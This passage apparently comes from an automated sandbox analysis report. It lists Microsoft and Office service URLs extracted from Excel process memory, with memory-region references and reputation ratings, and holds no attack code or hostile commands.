                                            https://tasks.office.comEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                              		high
                                              https://officeci.azurewebsites.net/api/EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://graph.ppe.windows.net/3EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                		high
                                                https://login.windows.net/common/oauth2/authorize#EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://login.windows.net/common/oauth2/authorize$EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://login.windows.net/common/oauth2/authorize%EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://store.office.cn/addinstemplateEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks#dEXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechfeEXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://onedrive.live.com/embed?iEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                              		high
                                                              https://incidents.diagnosticssdf.office.comejEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://substrate.office.comnEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://substrate.office.comlEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.odwebp.svc.msEXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://login.windows.net/comEXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                  		high
                                                                  https://web.microsoftstream.com/video/EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                    		high
                                                                    https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://substrate.office.comoEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://graph.windows.netEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                      		high
                                                                      https://substrate.office.comxEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://login.windows.net/common/oauth2/authorizeA4EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://outlook.office365.com/autodiscover/autodiscover.jsonJEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://substrate.office.comaEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                            		high
                                                                            https://ncus.contentsync.EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingMBI_SSL_SHORTssl.EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                		high
                                                                                http://weather.service.msn.com/data.aspxEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                  		high
                                                                                  https://substrate.office.comPEXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                    		high
                                                                                    https://api.diagnostics.office.comomEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                      		high
                                                                                      https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AzurEXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://devnull.onenote.comMBI_SSL_SHORTEXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
